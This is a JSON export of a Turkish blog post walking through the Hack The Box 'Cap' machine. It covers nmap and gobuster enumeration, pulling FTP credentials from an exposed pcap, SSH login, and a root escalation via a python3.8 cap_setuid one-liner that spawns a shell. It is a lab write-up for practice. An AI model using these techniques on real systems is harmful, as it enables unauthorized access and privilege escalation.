{"id":1575,"date":"2021-09-30T22:47:32","date_gmt":"2021-09-30T22:47:32","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1575"},"modified":"2021-09-30T22:47:32","modified_gmt":"2021-09-30T22:47:32","slug":"cap","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/09\/30\/cap\/","title":{"rendered":"Cap"},"content":{"rendered":"<table>\n<thead>\n<tr>\n<th>Makine Ad\u0131<\/th>\n<th>Seviye<\/th>\n<th>OS<\/th>\n<th>Logo<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><a href=\"https:\/\/app.hackthebox.eu\/machines\/Cap\" title=\"Cap\">Cap<\/a> - HTB<\/td>\n<td>Kolay<\/td>\n<td>Linux<\/td>\n<td><img decoding=\"async\" src=\"https:\/\/www.hackthebox.eu\/storage\/avatars\/70ea3357a2d090af11a0953ec8717e90.png\" alt=\"\" \/><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>Walkthrough<\/h2>\n<p>nmap taramas\u0131:<\/p>\n<pre><code class=\"language-sh\">PORT   STATE SERVICE VERSION                                                                                                                                                                                                                  \n21\/tcp open  ftp     vsftpd 3.0.3                                                                                                                                                                                                             \n22\/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)                                                                                                                                                             \n| ssh-hostkey:                                                                                                                                                                                                                                \n|   3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)                                                                                                                                                                                \n|   256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)                                                                                                                                                                               \n|_  256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)                                                                                                                                                                             \n80\/tcp open  http    gunicorn<\/code><\/pre>\n<p>80'e gitti\u011fimde basit bir internet sayfas\u0131 vard\u0131. Arkaplanda belirli komutlar \u00e7al\u0131\u015ftrarak \u00e7\u0131kt\u0131lar\u0131n\u0131 kullan\u0131c\u0131ya g\u00f6steriyordu. \u00c7\u0131kt\u0131lar\u0131n ajax call'lar ile gidebilece\u011fini d\u00fc\u015f\u00fcn\u00fcp burp ile trafi\u011fi analiz ettim ancak bir \u015fey bulamad\u0131m. Daha sonras\u0131nda dizin taramas\u0131 yapt\u0131m ancak ilginl bir \u015fey \u00e7\u0131kmad\u0131. <\/p>\n<pre><code class=\"language-sh\">\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# gobuster dir  --expanded --follow-redirect --url http:\/\/10.10.10.245\/ --no-error -t 50 --extensions php,txt,html --wordlist \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt --timeout 40s\n===============================================================\nGobuster v3.1.0\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/10.10.10.245\/\n[+] Method:                  GET\n[+] Threads:                 50\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.1.0\n[+] Extensions:              html,php,txt\n[+] Follow Redirect:         true\n[+] Expanded:                true\n[+] Timeout:                 40s\n===============================================================\n2021\/09\/30 17:32:56 Starting gobuster in directory enumeration mode\n===============================================================\nhttp:\/\/10.10.10.245\/data                 (Status: 200) [Size: 19386]\nhttp:\/\/10.10.10.245\/ip                   (Status: 200) [Size: 17376]\nhttp:\/\/10.10.10.245\/netstat              (Status: 200) [Size: 41264]\nhttp:\/\/10.10.10.245\/capture              (Status: 200) [Size: 19386]<\/code><\/pre>\n<p>\/capture sayfas\u0131na gitti\u011fmde beni \/data\/1 \/data\/2 \/data\/3 gibi sayfalara y\u00f6nlendiriyordu ve asl\u0131nda yapm\u0131\u015f oldu\u011fum isteklerin tcp dumplar\u0131n\u0131 elde etti\u011fim pcap dosyalar\u0131 g\u00f6r\u00fcyordum. Ancak \u00f6nemli bir bilgi \u00e7\u0131karamad\u0131m. Bunun \u00fczerine \/data k\u0131sm\u0131na dosya ve dizin taramas\u0131 yapmaya devam ettim.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# gobuster dir  --expanded --follow-redirect --url http:\/\/10.10.10.245\/data\/ --no-error -t 50 --wordlist sayi --exclude-length 19386\n===============================================================\nGobuster v3.1.0\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/10.10.10.245\/data\/\n[+] Method:                  GET\n[+] Threads:                 50\n[+] Wordlist:                sayi\n[+] Negative Status codes:   404\n[+] Exclude Length:          19386\n[+] User Agent:              gobuster\/3.1.0\n[+] Follow Redirect:         true\n[+] Expanded:                true\n[+] Timeout:                 10s\n===============================================================\n2021\/09\/30 18:07:53 Starting gobuster in directory enumeration mode\n===============================================================\nhttp:\/\/10.10.10.245\/data\/1                    (Status: 200) [Size: 17144]\nhttp:\/\/10.10.10.245\/data\/3                    (Status: 200) [Size: 17144]\nhttp:\/\/10.10.10.245\/data\/2                    (Status: 200) [Size: 17144]\nhttp:\/\/10.10.10.245\/data\/0                    (Status: 200) [Size: 17147]\n\n===============================================================\n2021\/09\/30 18:09:35 Finished\n===============================================================\n<\/code><\/pre>\n<p>\/data\/0 ilk defa g\u00f6rd\u00fc\u011f\u00fcm bir aland\u0131 ve statik bir dosya oldu\u011funu g\u00f6rd\u00fcm. Bu dosyay\u0131 wireshark ile inceledi\u011fimde i\u00e7inde ftp credential'\u0131 oldu\u011funu g\u00f6rd\u00fcm. Daha sonras\u0131nda bu credential ile ssh ba\u011flant\u0131s\u0131 kurdum ve ilk flagi okudum.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~]                                                                                                    \n\u2514\u2500# ssh nathan@10.10.10.245                                \nnathan@10.10.10.245&#039;s password:                                                                                        \nWelcome to Ubuntu 20.04.2 LTS (GNU\/Linux 5.4.0-80-generic x86_64)\n\n * Documentation:  https:\/\/help.ubuntu.com                                                                                                                                                                                                    \n * Management:     https:\/\/landscape.canonical.com         \n * Support:        https:\/\/ubuntu.com\/advantage \n\n System information disabled due to load higher than 2.0\n\n * Super-optimized for small spaces - read how we shrank the memory\n   footprint of MicroK8s to make it the smallest full K8s around.\n\n   https:\/\/ubuntu.com\/blog\/microk8s-memory-optimisation    \n\n63 updates can be applied immediately.                     \n42 of these updates are standard security updates.                                                                                                                                                                                            \nTo see these additional updates run: apt list --upgradable                                                                                                                                                                                    \n\nThe list of available updates is more than a week old.     \nTo check for new updates run: sudo apt update              \n\nLast login: Thu May 27 11:21:27 2021 from 10.10.14.7\nnathan@cap:~$ alias ls=&quot;ls -al&quot;                            \nnathan@cap:~$ ls                                                                                                       \ntotal 28                                                   \ndrwxr-xr-x 3 nathan nathan 4096 May 27 09:16 .             \ndrwxr-xr-x 3 root   root   4096 May 23 19:17 ..                                                                        \nlrwxrwxrwx 1 root   root      9 May 15 21:40 .bash_history -&gt; \/dev\/null                                                \n-rw-r--r-- 1 nathan nathan  220 Feb 25  2020 .bash_logout                                                              \n-rw-r--r-- 1 nathan nathan 3771 Feb 25  2020 .bashrc\ndrwx------ 2 nathan nathan 4096 May 23 19:17 .cache\n-rw-r--r-- 1 nathan nathan  807 Feb 25  2020 .profile\nlrwxrwxrwx 1 root   root      9 May 27 09:16 .viminfo -&gt; \/dev\/null\n-r-------- 1 nathan nathan   33 Sep 30 22:02 user.txt                                                                  \nnathan@cap:~$ cat user.txt                                 \na858********************         <\/code><\/pre>\n<p>Daha sonras\u0131nda i\u00e7eriye linPeas att\u0131m ve inceleme yapmaya devam ettim. A\u015fa\u011f\u0131daki ilgi \u00e7ekici sonucu buldum.<\/p>\n<pre><code class=\"language-sh\">\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 Capabilities\n\u255a https:\/\/book.hacktricks.xyz\/linux-unix\/privilege-escalation#capabilities\nCurrent capabilities:\nCurrent: =\nCapInh:   0000000000000000\nCapPrm:   0000000000000000\nCapEff:   0000000000000000\nCapBnd:   0000003fffffffff\nCapAmb:   0000000000000000\n\nShell capabilities:\n0x0000000000000000=\nCapInh:   0000000000000000\nCapPrm:   0000000000000000\nCapEff:   0000000000000000\nCapBnd:   0000003fffffffff\nCapAmb:   0000000000000000\n\nFiles with capabilities (limited to 50):\n\/usr\/bin\/python3.8 = cap_setuid,cap_net_bind_service+eip\n\/usr\/bin\/ping = cap_net_raw+ep\n\/usr\/bin\/traceroute6.iputils = cap_net_raw+ep\n\/usr\/bin\/mtr-packet = cap_net_raw+ep\n\/usr\/lib\/x86_64-linux-gnu\/gstreamer1.0\/gstreamer-1.0\/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep<\/code><\/pre>\n<p><a href=\"https:\/\/book.hacktricks.xyz\/linux-unix\/privilege-escalation\/linux-capabilities#capabilities\">https:\/\/book.hacktricks.xyz\/linux-unix\/privilege-escalation\/linux-capabilities#capabilities<\/a> sayfas\u0131nda nas\u0131l exploit edebilece\u011fimiz a\u00e7\u0131klanm\u0131\u015f. Ben de direkt olarak exploit ettim.<\/p>\n<pre><code class=\"language-sh\">nathan@cap:\/tmp$ \/usr\/bin\/python3.8 -c &#039;import os; os.setuid(0); os.system(&quot;\/bin\/bash&quot;);&#039;                              \nroot@cap:\/tmp# cd \/root                                                                                                                                                                                                                       \nroot@cap:\/root# ls                                                                                                                                                                                                                            \nroot.txt  snap                                                                                                                                                                                                                                \nroot@cap:\/root# cat root.txt                                                                                           \nbe696caaa**************** <\/code><\/pre>\n<p>Bu benim i\u00e7in \u00f6nemli bir maline \u00e7\u00fcnk\u00fc hen\u00fcz retired olmam\u0131\u015f bir makineydi Bu y\u00fczden flaglari y\u0131ld\u0131zl\u0131 koydum.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Makine Ad\u0131 Seviye OS Logo Cap &#8211; HTB Kolay Linux Walkthrough nmap taramas\u0131: PORT STATE SERVICE VERSION 21\/tcp open ftp vsftpd 3.0.3 22\/tcp open ssh&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/09\/30\/cap\/\">Devam\u0131n\u0131 oku<span class=\"screen-reader-text\">Cap<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[498],"tags":[],"class_list":["post-1575","post","type-post","status-publish","format-standard","hentry","category-walkthrough","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1575","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1575"}],"version-history":[{"count":1,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1575\/revisions"}],"predecessor-version":[{"id":1576,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1575\/revisions\/1576"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1575"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1575"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1575"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}